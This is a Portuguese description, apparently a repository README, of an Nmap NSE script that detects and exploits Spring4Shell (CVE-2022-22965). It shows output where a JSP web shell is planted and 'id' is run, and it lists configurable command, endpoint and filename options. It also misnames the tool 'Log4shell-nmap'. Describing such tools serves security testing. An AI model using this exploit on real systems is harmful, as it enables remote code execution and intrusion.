
Script NSE do Nmap para detectar e explorar a vulnerabilidade de execução remota de código (RCE) Spring4Shell (CVE-2022-22965) em serviços HTTP, com injeção de payload configurável e execução de comandos.
Log4shell-nmap é um script NSE para detectar vulnerabilidades de RCE Spring4Shell (CVE-2022-22965) em serviços HTTP. O script injeta o payload correto na aplicação e então executa o seguinte comando no endpoint especificado.
Veja aqui.
┌──(kali㉿kali)-[~/nmap-spring4shell]
└─$ nmap 127.0.0.1 --script=./spring4shell.nse
(...)
PORT STATE SERVICE REASON VERSION
8080/tcp open http-proxy syn-ack
| spring4shell:
| VULNERABLE:
| Spring4Shell - Spring Framework RCE via Data Binding on JDK 9+
| State: VULNERABLE
| IDs: CVE:CVE-2022-22965
| Check results:
| 127.0.0.1:8080/shell.jsp?pwd=j&cmd=id
| Extra information:
| TESTED URL: 127.0.0.1:8080
| COMMAND: id
| ASSERTION: uid
| References:
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965
Podemos usar várias variáveis no script. Estas são as seguintes:
endpoint - url relativa. Em https://bugspace.pl/search/videos será /search/videos,command - comando a ser executado no servidor. O comando padrão é id,assertion - a string verificada na resposta do servidor. A afirmação padrão é uid,filename - nome do arquivo no servidor. Para mais informações veja aqui. O nome padrão é shell.Testado na aplicação de aqui e aqui
Mesma do Nmap. Veja https://nmap.org/book/man-legal.html